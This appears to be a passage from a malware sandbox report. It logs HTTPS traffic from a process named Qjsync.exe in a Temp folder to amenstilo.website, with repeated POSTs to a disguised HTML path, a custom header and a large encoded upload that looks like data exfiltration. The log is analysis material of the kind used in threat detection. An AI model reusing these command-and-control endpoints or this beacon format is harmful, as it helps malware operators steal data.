2024-12-02 06:25:08 UTC	1369	IN	Data Raw: 05 05 11 14 0a 19 b5 b5 da 0f 06 08 84 5b b8 78 4a f3 94 96 e6 ea c6 e8 50 ca d2 d0 c0 5a 01 dd 00 14 00 08 00 05 05 11 14 0a 19 e9 e9 e7 5a 01 08 f1 67 87 8d 07 4e 4e 48 ed c9 5b 7a 3c ee ea 6e 69 0f d2 09 14 00 08 00 05 05 11 14 0a 19 b5 b5 c0 69 0f 08 84 5b b8 78 4a f3 94 96 c8 d4 da c4 ce e4 ce 58 f0 03 d3 04 14 00 0b 00 05 05 11 14 0a 19 b5 b5 f6 f0 03 08 84 5b b8 78 4a f3 94 96 58 ea e4 c6 ce d6 58 50 c6 fc c6 34 0a 77 03 14 00 08 00 05 05 11 14 0a 19 e9 e9 bd 34 0a 08 59 86 ea 88 7e 40 e3 ae 45 28 36 7f 45 e0 47 88 ec 0a 59 05 10 00 04 00 05 05 11 14 0a 19 d2 d2 c0 ec 0a 04 da 48 c7 5c f0 67 20 ce 78 0b 67 03 14 00 22 00 05 05 11 14 0a 19 b5 b5 d5 78 0b 08 84 5b b8 78 4a f3 94 96 d6 c6 ea ea c6 d0 c2 c6 e8 ea b4 84 de ea ca d2 e8 c4 b4 84 c6 e0 c6 Data Ascii: [xJPZZgNNH[z<nii[xJX[xJXXP4w4Y~@E(6EGYH\g xg"x[xJ
2024-12-02 06:25:08 UTC	1369	IN	Data Raw: 08 84 5b b8 78 4a f3 94 96 58 50 d4 d2 c2 51 06 22 0b 14 00 08 00 05 05 11 14 0a 19 e9 e9 fd 51 06 08 35 ea 48 47 79 39 b8 bd 2c 44 94 b0 42 99 1c 9b 66 03 2e 06 10 00 04 00 05 05 11 14 0a 19 d2 d2 d5 66 03 04 f8 87 5e b6 d2 ac b9 24 85 01 0b 06 10 00 04 00 05 05 11 14 0a 19 d2 d2 e7 85 01 04 2c f5 aa 2b 02 da 4d b9 f7 0e cd 04 14 00 1b 00 05 05 11 14 0a 19 b5 b5 c0 f7 0e 08 84 5b b8 78 4a f3 94 96 aa d2 c0 e4 e2 ce e8 c6 b4 88 de e4 ca d2 de d0 b4 88 de e4 ca d2 de d0 56 ae e4 fb 0e d3 0e 14 00 15 00 05 05 11 14 0a 19 b5 b5 fd fb 0e 08 84 5b b8 78 4a f3 94 96 e0 d0 ca b4 a8 c6 ce d4 a0 90 8a b4 c4 ce e4 ce 50 d8 ea d2 d0 a9 02 90 01 14 00 05 00 05 05 11 14 0a 19 b5 b5 bd a9 02 08 84 5b b8 78 4a f3 94 96 58 50 d6 ea c0 0c 0c a1 0e 10 00 04 00 05 05 11 14 Data Ascii: [xJXPQ"Q5HGy9,DBf.f^$,+M[xJV[xJP[xJXP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49841	104.21.74.149	443	5648	C:\Users\user\AppData\Local\Temp\Qjsync.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 06:25:10 UTC	511	OUT	POST /courtney_ryley_cooper_biography.html?jobjbyy11iib4wpr=h3593GdmUsLiBsC%2FsjqNL9WLjcuO1JIs5YlYwsq2r0v2XtuOfeIISqlAWv5gAlx740W1uYA%2FAE%2FbB%2BPI3Lm%2FUw%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 keephis: muBSN9rS0m9IJp1td7zVaQplRSv1+npjCmN1+3Lp5KRnx3l+GpkQBQzoL3U0WvsRkGE+NF+ehk3fqBN20gQOF6/nAUHcsQFmStSolt9u4BXbAdffJ/ulEuxaOR7PEJni Content-Length: 53 Host: amenstilo.website
2024-12-02 06:25:10 UTC	53	OUT	Data Raw: fd ff ff ff 00 00 00 00 00 00 00 00 03 00 00 00 92 00 03 fe ff ff ff 00 00 00 00 00 00 00 00 02 00 00 00 91 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii:
2024-12-02 06:25:11 UTC	752	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 06:25:11 GMT Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ls2A6MXT278MxJRRrjFlGMEwiUgb21%2BL59Kpk7RRBedHSQRagUsErJVDzaoAlHiflTtESumtVuMtctwzpUGfNsZAFbVWE9oziQxXXmbcBEKllup8D%2FkM90W8ytbeOQU4ZUKWTw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eb93cfb78f38c69-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1877&min_rtt=1815&rtt_var=804&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=1200&delivery_rate=1263522&cwnd=217&unsent_bytes=0&cid=f02d59f651808a5f&ts=827&x=0"
2024-12-02 06:25:11 UTC	24	IN	Data Raw: 31 32 0d 0a fe ff ff ff 00 00 00 00 00 00 00 00 02 00 00 00 91 90 0d 0a Data Ascii: 12
2024-12-02 06:25:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49847	104.21.74.149	443	5648	C:\Users\user\AppData\Local\Temp\Qjsync.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 06:25:12 UTC	512	OUT	POST /courtney_ryley_cooper_biography.html?jobjbyy11iib4wpr=h3593GdmUsLiBsC%2FsjqNL9WLjcuO1JIs5YlYwsq2r0v2XtuOfeIISqlAWv5gAlx740W1uYA%2FAE%2FbB%2BPI3Lm%2FUw%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 keephis: muBSN9rS0m9IJp1td7zVaQplRSv1+npjCmN1+3Lp5KRnx3l+GpkQBQzoL3U0WvsRkGE+NF+ehk3fqBN20gQOF6/nAUHcsQFmStSolt9u4BXbAdffJ/ulEuxaOR7PEJni Content-Length: 208 Host: amenstilo.website
2024-12-02 06:25:12 UTC	208	OUT	Data Raw: fd ff ff ff 00 00 00 00 00 00 00 00 03 00 00 00 92 00 01 2a 9b 49 07 08 00 00 00 32 00 00 00 95 00 00 00 84 75 ea 08 34 7f 94 96 58 3b 9e 02 0c 0c 0c 0c 0c 0c 0c 0c 0a 0c 0c 0c 29 8d 2d 58 3b 9e 02 0c 0c 0c 0c 0c 0c 0c 0c c8 0c 0c 0c ac 9a 00 00 54 0c 0c 0c 0c 0c 0c 0c 56 0c 56 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ac 9a 00 02 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0e 0c 0c 0c ac 9a 06 00 0c 0c 0c 0c f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 0c 0c f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: *I2u4X;)-X;TVV
2024-12-02 06:25:13 UTC	874	IN	HTTP/1.1 204 No Content Date: Mon, 02 Dec 2024 06:25:13 GMT Connection: close id: muBSN9rS0m9IJp1td7zVaQplRSv1+npjCmN1+3Lp5KRnx3l+GpkQBQzoL3U0WvsRkGE+NF+ehk3fqBN20gQOF6/nAUHcsQFmStSolt9u4BXbAdffJ/ulEuxaOR7PEJni CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A%2FyyNB1Acai48tchacCB%2BxKYWerRNnzmWJdrp23fPsAemN%2F3FVekGaXHEJHmGm1zCBjL6%2BRwLiUeCyYw8%2FL4eugOc3dNOJjUia%2F2V7X9ndE28mF950e59lDvwzGl7eIR55K87Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eb93d086c670fa3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1656&min_rtt=1647&rtt_var=635&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1356&delivery_rate=1698662&cwnd=219&unsent_bytes=0&cid=a0e82cd43d45a394&ts=784&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49856	104.21.74.149	443	5648	C:\Users\user\AppData\Local\Temp\Qjsync.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 06:25:16 UTC	515	OUT	POST /courtney_ryley_cooper_biography.html?jobjbyy11iib4wpr=h3593GdmUsLiBsC%2FsjqNL9WLjcuO1JIs5YlYwsq2r0v2XtuOfeIISqlAWv5gAlx740W1uYA%2FAE%2FbB%2BPI3Lm%2FUw%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 keephis: muBSN9rS0m9IJp1td7zVaQplRSv1+npjCmN1+3Lp5KRnx3l+GpkQBQzoL3U0WvsRkGE+NF+ehk3fqBN20gQOF6/nAUHcsQFmStSolt9u4BXbAdffJ/ulEuxaOR7PEJni Content-Length: 129223 Host: amenstilo.website
2024-12-02 06:25:16 UTC	15331	OUT	Data Raw: fd ff ff ff 00 00 00 00 00 00 00 00 03 00 00 00 92 00 01 d8 89 9c 02 08 00 00 00 32 00 00 00 18 a4 01 00 84 75 ea 08 34 7f 94 96 bd 1f 35 08 0c 0c 0c 0c 0c 0c 0c 0c 1c 0a 0c 0c 2b 8d 2d 29 3d 8d 2d 41 8a dc e8 d2 d6 c6 bf 62 8a 78 b4 a6 ea c6 e8 ea b4 c6 d0 c2 de d0 c6 c6 e8 b4 8e ec ec 84 ce e4 ce b4 94 d2 ca ce d4 b4 82 d2 d2 c2 d4 c6 b4 8a dc e8 d2 d6 c6 b4 a6 ea c6 e8 4c 84 ce e4 ce 2f 3f 8d 2d 43 84 c6 c0 ce e6 d4 e4 bf 72 8a 78 b4 a6 ea c6 e8 ea b4 c6 d0 c2 de d0 c6 c6 e8 b4 8e ec ec 84 ce e4 ce b4 94 d2 ca ce d4 b4 82 d2 d2 c2 d4 c6 b4 8a dc e8 d2 d6 c6 b4 a6 ea c6 e8 4c 84 ce e4 ce b4 84 c6 c0 ce e6 d4 e4 bf 64 ca dc e8 d2 d6 de e6 d6 b2 c8 e8 d2 e2 ea c6 e8 ea b4 8a dc e8 d2 d6 c6 b4 ec e8 d2 c0 de d4 c6 ea b4 84 c6 c0 ce e6 d4 e4 b4 94 d2 c2 de Data Ascii: 2u45+-)=-AbxL/?-CrxLd
2024-12-02 06:25:16 UTC	15331	OUT	Data Raw: 92 bc b9 05 03 9f 5e 90 ac 0f 49 15 90 e3 52 7e 69 d8 75 c3 2d 57 88 6d 16 85 65 b1 a1 a0 39 2f 55 39 de 4d 38 3e 21 20 ca 26 f4 f4 b1 19 fc 19 69 36 7f 43 bc da 01 56 5a 69 a2 58 02 03 41 97 0b 34 21 09 58 e0 3b 79 47 c5 75 aa ce 6b a7 5c 4e 04 ba c4 f2 8a cc cc 40 29 46 2e 86 15 23 be 0a 70 a7 e1 0b 6f 16 f9 b0 b6 a8 47 ba a8 66 19 69 47 9e 7d 3d 30 3a 62 09 e0 ec 71 17 fe 71 b5 e2 c5 5f 45 f6 85 99 f4 7c be 0d dc e1 cf 15 0e 5a b8 67 68 54 d5 bb 05 89 4b 33 0e ed e1 29 b1 43 b2 53 1e cd 76 9b d7 ba cd 28 13 d7 0a 84 1a c9 ca 05 92 99 e9 a6 48 5f e5 c0 87 2c c0 fd c4 77 da 72 0e ad 07 bf dc df 4e f7 27 c4 98 0a e7 2d 6f 4f ac f1 51 1b dd ca d2 62 ae 62 78 4b b2 01 56 80 f9 de 81 e7 70 05 9e b4 c6 fe ca d4 a8 05 f4 04 18 d5 51 52 e5 77 74 98 19 ba 41 16 Data Ascii: ^IR~iu-Wme9/U9M8>! &i6CVZiXA4!X;yGuk\N@)F.#poGfiG}=0:bqq_E\|ZghTK3)CSv(H_,wrN'-oOQbbxKVpQRwtA
2024-12-02 06:25:16 UTC	15331	OUT	Data Raw: 8a 17 66 aa 03 b8 cf 38 c1 2a 51 23 ed 4f 96 15 e7 b9 ba 30 cf a5 58 4f 9f 61 b1 20 f6 87 66 07 60 fe da d0 3f 0c eb a4 4c 26 fe 11 03 37 00 5d 93 1b ab 68 58 25 3a b1 ba bd 69 54 e2 bd df cf 63 fd 60 b4 76 df bc a1 05 6e d5 09 5d 07 d8 58 d7 3e eb a5 ef 0a 31 58 6d 0c 3c 4e ab d7 3d 09 5e 02 a4 8d aa ec ac 07 19 eb 89 63 9b 75 50 f8 0f ae fc fa d8 32 f2 10 ae a5 39 ac 87 db 3e 97 6d 48 0f 2e 2c 91 ce 29 0f d8 b7 d0 0b c0 8f de b7 c1 16 9e 87 52 56 2c 57 be 81 d3 4c 45 cd 28 8b 87 c5 79 17 92 3f 26 ba 63 74 ad 87 3d f4 50 f4 94 7e 83 f5 0d dc 55 00 94 7c 1b 3e 3a 7e 67 1a 0a 3a 87 a1 14 ad c4 25 1f 6c 0d 2f 3b 87 c1 5d 4d 0d c8 ff 0f 97 50 75 8b 0d c8 88 2e 68 cb 9d 35 b3 c1 e7 35 40 4c bd bd 9c 5a fc a1 9c 4c 7b 1e 84 97 b6 f5 45 88 2d ac 0f ef 15 4a 17 Data Ascii: f8*Q#O0XOa f`?L&7]hX%:iTc`vn]X>1Xm<N=^cuP29>mH.,)RV,WLE(y?&ct=P~U\|>:~g:%l/;]MPu.h55@LZL{E-J
2024-12-02 06:25:16 UTC	15331	OUT	Data Raw: 7a ab fa 9b f2 34 1e 42 18 88 62 5c 89 31 44 ed 9a 91 97 dc 28 5e 91 93 44 d4 32 0d d8 56 0c 97 44 af 4a 37 88 b9 c7 c1 46 88 e9 67 9c ee 71 02 ad 1f 9b 9c 12 c8 c6 37 a1 d6 8b ce ad a4 f0 57 9d bd 80 18 12 85 a7 e6 79 87 1d 5b f5 e6 71 e9 af 10 1c 43 57 e6 0f bc 77 0d 43 17 a7 bb 06 9d 04 1c 61 8d 04 cc cc 1a 35 4c a0 d2 4c 4c 2a 66 ff 0a c4 09 04 ba cd f3 7a b7 db 31 48 ed 70 e0 6d 45 d2 87 7a 5d 02 48 b2 9e 85 d0 80 1b 36 fe c0 66 fe 7f f4 ae db 33 4f 37 72 e6 40 84 92 d9 ca 45 4c 5c a9 9a f7 3a 23 b5 28 46 d2 3c 0d be 47 ef de 17 06 09 e0 c6 d8 14 6a b0 8f e0 90 7b da e4 83 02 56 20 1c 38 89 05 5f 0d 46 7c e4 62 c4 af cb c3 5a f0 34 4e ae 5a d4 a0 76 8c 9d ea 0c d4 38 bd 40 df 39 c6 a2 ed 6e 5e 8e b9 8d 30 77 37 d5 49 f7 72 68 f9 32 3e cb ca 99 ae aa Data Ascii: z4Bb\1D(^D2VDJ7Fgq7Wy[qCWwCa5LLL*fz1HpmEz]H6f3O7r@EL\:#(F<Gj{V 8_F\|bZ4NZv8@9n^0w7Irh2>
2024-12-02 06:25:16 UTC	15331	OUT	Data Raw: de 3b 52 32 ff 20 23 52 d3 52 f3 f7 08 8e 44 83 8d 5c 8c cd 14 0e 49 6c 88 2e 04 13 0d 24 1c ef 6c 07 08 5c 12 8b 0c 06 ad 34 19 6a 1c 95 ca 14 82 8a 44 13 cd 4c 0e 4c 2c 83 6a 1c f3 b3 52 52 53 52 ef 64 57 32 df 7d 12 bb 82 b8 c7 de fb 6f a7 f6 f1 e9 f1 08 89 6c 08 2d 3c 1c 8e 3c 0d 4f 0c 9e 71 75 71 c4 ff b9 d0 cb e5 af 13 be f1 e9 f1 53 23 65 9b cb c7 ca b8 e9 c8 f7 3c 03 64 f3 1d 43 5f 5b eb d5 c7 f6 ba e1 f5 e7 47 b0 72 81 cf c7 77 1d 7b e7 42 e7 2f 74 70 69 75 1d e3 d0 fb 3a d1 66 13 23 65 f9 3c 03 d1 ef 33 fc f2 f2 f6 9f 81 70 51 03 13 7c b7 d9 ee bc 72 a9 ee 5c d9 e9 c7 f7 86 84 a0 1f f9 ff 4b 0d c4 15 b4 aa d6 98 81 cd 5e c8 8d 06 5e 57 c5 9c 21 c2 0b 83 90 a9 8c c0 02 5f a6 a3 51 c2 e6 e9 1d 58 bc 31 c4 fb e2 ea 48 8c b1 3b ba ef e8 fe 88 49 7b Data Ascii: ;R2 #RRD\Il.$l\4jDLL,jRRSRdW2}ol-<<OquqS#e<dC_[Grw{B/tpiu:f#e<3pQ\|r\K^^W!_QX1H;I{
2024-12-02 06:25:16 UTC	15331	OUT	Data Raw: f1 8b b5 08 ef 44 81 69 6c 08 ed 14 05 e8 64 97 cb 14 0c 2a 2c 97 8a 7c 17 4e 74 82 0d 64 95 49 2c 01 6b 0c 1a 2b 4c 92 0f 14 17 8d 7c 82 ce 1c 89 c8 14 f1 32 80 fd 53 a6 a1 d3 53 52 ca 74 65 d7 a4 42 aa 74 61 c6 31 20 de bb c0 d6 3e 13 ee af e6 e7 24 f3 b6 22 f0 00 66 f3 c5 23 2c 00 4e dc 29 ca bc 08 43 3c 21 c6 1e 24 cd 9e 19 88 7e 2d 4e be 05 4d ee 18 40 1e 21 ca 8c 3d 07 ee 15 ce 6e 1d 86 ae 21 c8 de 20 8f 2c d9 33 f7 28 01 2d 85 d2 33 2b 7e ef 66 56 11 a6 b9 c1 86 62 a4 fe ff 5f e5 e4 98 19 5e 57 cb 55 55 bb e4 55 f1 50 91 0b f3 8b 94 0c ce 4c 04 ab 34 13 6b 7c 15 89 3c 09 08 04 00 6f 2c 0b 6d 1c 88 c8 6c 1b 8a 0c 86 2e 0c 17 ef 14 85 28 1c 1f ef 5c 98 68 64 9f 0d 74 9b af 33 61 e3 e3 8d 0f b3 0d b3 8d 52 83 64 60 9e a2 85 86 ab a3 e6 3b 65 ff 64 14 Data Ascii: Dild*,\|NtdI,k+L\|2SSRteBta1 >$"f#,N)C<!$~-NM@!=n! ,3(-3+~fVb_^WUUUPL4k\|<o,ml.(\hdt3aRd`;ed
2024-12-02 06:25:16 UTC	15331	OUT	Data Raw: bf ef fd 88 e0 0a a1 43 2e 1a ea 17 48 75 eb 16 bb c9 70 92 bd c4 0b 9b 11 dd a9 13 fe 28 aa 52 2c b0 c2 75 4b 60 13 80 3a e4 0b 3d ff 0b 7c 54 cb 34 b7 bc 99 64 f8 9b dd a5 e4 3f 9c c5 4d c8 c8 b5 90 53 3e 2e de 7b 41 af cc e9 03 7e d8 38 fa 93 f6 bc 76 59 36 b9 e2 5a e0 3c 73 2c ae 3b 30 02 6f a3 cf 70 d6 87 9f 6d 1e 3d c9 e4 a5 05 ce d5 1b 21 fc 8a be 29 82 70 92 5c 12 3f 9d 63 86 21 b8 d4 99 65 e5 05 fa b4 75 9d 33 02 fe 89 28 2e 67 de 24 5a af 28 b0 a1 ac 0b 2b ef 01 37 e2 fc b3 7a ce 48 49 89 c3 2f 28 56 8f 03 82 e8 a4 b3 72 7c e8 eb 8b c0 e8 84 35 32 1e 2b 4a 4d bd 3f 36 c3 e1 75 ce f6 e2 96 4a df 67 c6 6c 61 be 92 87 df 68 36 b4 9a 60 6b 93 07 21 c0 b8 5b 5b b9 df 37 e4 05 03 b4 6f 2d 5a 60 a2 3c b7 4e a2 d4 4b 8b fb e0 57 ae f2 e4 f0 55 14 12 48 Data Ascii: C.Hup(R,uK`:=\|T4d?MS>.{A~8vY6Z<s,;0opm=!)p\?c!eu3(.g$Z(+7zHI/(Vr\|52+JM?6uJglah6`k![[7o-Z`<NKWUH
2024-12-02 06:25:16 UTC	15331	OUT	Data Raw: de ea e4 d2 e8 fe 0e 0c 3c 0c 0c ec 08 0c 0c 0c 0c 0c ce 1a 0c 0c 0c 0c 0c 0c b2 b3 0c 0c 0c 0c 0c 0c ac 9a 0e 08 56 0c 56 0c 0c 1c 1c 0c 38 b8 14 a2 25 8b 30 41 f3 f3 f3 f3 f3 f3 f3 f3 6c 0c 34 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c f3 f3 f3 f3 ca dc e8 d2 d6 de e6 d6 b2 c8 e8 d2 e2 ea c6 e8 ea 52 86 c4 c2 c6 52 ec e8 d2 c0 de d4 c6 ea 52 84 c6 c0 ce e6 d4 e4 52 a2 c6 c8 4c 84 ce e4 ce 0e 0c 3c 0c 0c 0c 0a 0c 0c 0c 0c 0c bb 4c 0c 0c 0c 0c 0c 0c 51 da 0e 0c 0c 0c 0c 0c ac 9a 00 00 54 0c 0c 0c 0c 0c 0c 0c 56 0c 56 0c 0c 0c 0c 0c 0c 0c 0c 0c 2c 0c 0c 0c 0c 0c 0c 0c 2c 0c 0c 0c 0c 0c 0c 0c bd 02 0c 0c 0c 0c 0c 0c 41 3d 0e 0c 0c 0c 0c 0c ac 9a 00 02 0c 0c 0c 0c f0 4d 0e 0c 0c 0c 0c 0c 0e 0c 0c 0c ac 9a 06 00 0c 0c 0c 0c f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 0c 0c f3 Data Ascii: <VV8%0Al4RRRRL<LQTVV,,A=M
2024-12-02 06:25:16 UTC	6575	OUT	Data Raw: 10 22 91 85 9e df 3f 7d 71 7d 67 7b ef 95 27 c3 30 fe f9 27 fd 27 47 83 1a e2 03 5c 55 12 af ad ad 1a 57 ba 67 f8 77 69 aa 1b 37 07 da 32 74 f7 dd 87 6a 12 b2 f6 c5 d9 02 03 d3 10 ae 5c 80 d3 df 26 50 80 8a 7f d0 ea 71 a0 b2 77 9b d3 f4 cf 17 f0 4f 53 b4 b8 17 50 23 9b c7 e9 ad a4 51 a2 59 7d a0 58 de 67 d9 6b 27 e1 01 88 d2 b1 f2 ca 66 79 a2 5c 23 60 8b 02 6a 6a fb ca 3f 38 df e2 d3 b7 0b 01 e9 17 a1 d4 57 30 e3 3a f9 77 b3 3e e5 51 32 bb da 43 74 e5 ec 71 b2 dd b1 f0 4f c9 ad ac a8 be dd 93 fd 4d d2 b3 ff 89 3a 9e c6 4f ab 52 ac 50 03 2c 41 68 57 f1 7c 30 30 d9 66 68 79 b9 9c 64 a5 1d 3b b7 17 0b e1 e7 8b 17 7d bf 36 65 2f 7a 28 b7 36 49 6c 78 78 70 dd a1 c1 af d8 63 b8 9f 4c e3 fc 1c 4e 54 c2 b9 0a 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c Data Ascii: "?}q}g{'0''G\UWgwi72tj\&PqwOSP#QY}Xgk'fy\#`jj?8W0:w>Q2CtqOM:ORP,AhW\|00fhyd;}6e/z(6IlxxpcLNT
2024-12-02 06:25:17 UTC	874	IN	HTTP/1.1 204 No Content Date: Mon, 02 Dec 2024 06:25:17 GMT Connection: close id: muBSN9rS0m9IJp1td7zVaQplRSv1+npjCmN1+3Lp5KRnx3l+GpkQBQzoL3U0WvsRkGE+NF+ehk3fqBN20gQOF6/nAUHcsQFmStSolt9u4BXbAdffJ/ulEuxaOR7PEJni CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gFeuhJzMk1A12gQsM10wBaudqTQKjcHYpfW7zG7GfcMDvu4Q4iongIAlX045yzm22Mk2TPvDothdLtVJZ6bQ8cK%2Fs3%2FqfiOmCHw9MDkEsX6UqS58hnTsU2lS6zD%2B5PHPpTw0kA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eb93d1f4a2c4394-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1575&min_rtt=1566&rtt_var=606&sent=74&recv=140&lost=0&retrans=0&sent_bytes=2846&recv_bytes=130726&delivery_rate=1776155&cwnd=168&unsent_bytes=0&cid=f74073287fc18946&ts=1392&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49861	104.21.74.149	443	5648	C:\Users\user\AppData\Local\Temp\Qjsync.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 06:25:19 UTC	512	OUT	POST /courtney_ryley_cooper_biography.html?jobjbyy11iib4wpr=h3593GdmUsLiBsC%2FsjqNL9WLjcuO1JIs5YlYwsq2r0v2XtuOfeIISqlAWv5gAlx740W1uYA%2FAE%2FbB%2BPI3Lm%2FUw%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 keephis: muBSN9rS0m9IJp1td7zVaQplRSv1+npjCmN1+3Lp5KRnx3l+GpkQBQzoL3U0WvsRkGE+NF+ehk3fqBN20gQOF6/nAUHcsQFmStSolt9u4BXbAdffJ/ulEuxaOR7PEJni Content-Length: 745 Host: amenstilo.website
2024-12-02 06:25:19 UTC	745	OUT	Data Raw: fd ff ff ff 00 00 00 00 00 00 00 00 03 00 00 00 92 00 01 c1 a9 a5 07 08 00 00 00 32 00 00 00 95 00 00 00 84 75 ea 08 34 7f 94 96 8f 5f 47 02 0c 0c 0c 0c 0c 0c 0c 0c 0a 0c 0c 0c 29 8d 2d 8f 5f 47 02 0c 0c 0c 0c 0c 0c 0c 0c c8 0c 0c 0c ac 9a 00 00 54 0c 0c 0c 0c 0c 0c 0c 56 0c 56 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ac 9a 00 02 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0e 0c 0c 0c ac 9a 06 00 0c 0c 0c 0c f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 0c 0c f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 11 e5 3d 00 08 00 00 00 32 00 00 00 a7 00 00 00 84 75 ea 08 34 7f 94 96 2e c7 76 0c 0c 0c 0c 0c 0c 0c 0c 0c 26 0c 0c 0c 29 8d 29 27 8d 08 0e 4b 29 8d 0c 4d 27 8d 0e 0e 4b 29 8d 0c 4d 2e c7 Data Ascii: 2u4_G)-_GTVV=2u4.v&))'K)M'K)M.
2024-12-02 06:25:19 UTC	864	IN	HTTP/1.1 204 No Content Date: Mon, 02 Dec 2024 06:25:19 GMT Connection: close id: muBSN9rS0m9IJp1td7zVaQplRSv1+npjCmN1+3Lp5KRnx3l+GpkQBQzoL3U0WvsRkGE+NF+ehk3fqBN20gQOF6/nAUHcsQFmStSolt9u4BXbAdffJ/ulEuxaOR7PEJni CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OXv9kHbfZjfU7Y0cfK3fndQJpvqtuC1mDbuDp5dEKjgwZpR52GpEwN7VP0IXhbNKX72ZfgZdy3LJMJWHCZAti%2FLRsDoT2lG6ZmlEWW4fmdQLJpL6hGIu1FRehGMTzKbD7mLqVw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eb93d303c4b41a1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1793&min_rtt=1781&rtt_var=676&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2845&recv_bytes=1893&delivery_rate=1639528&cwnd=224&unsent_bytes=0&cid=7965ccc294154266&ts=619&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49866	104.21.74.149	443	5648	C:\Users\user\AppData\Local\Temp\Qjsync.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 06:25:21 UTC	512	OUT	POST /courtney_ryley_cooper_biography.html?jobjbyy11iib4wpr=h3593GdmUsLiBsC%2FsjqNL9WLjcuO1JIs5YlYwsq2r0v2XtuOfeIISqlAWv5gAlx740W1uYA%2FAE%2FbB%2BPI3Lm%2FUw%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 keephis: muBSN9rS0m9IJp1td7zVaQplRSv1+npjCmN1+3Lp5KRnx3l+GpkQBQzoL3U0WvsRkGE+NF+ehk3fqBN20gQOF6/nAUHcsQFmStSolt9u4BXbAdffJ/ulEuxaOR7PEJni Content-Length: 212 Host: amenstilo.website
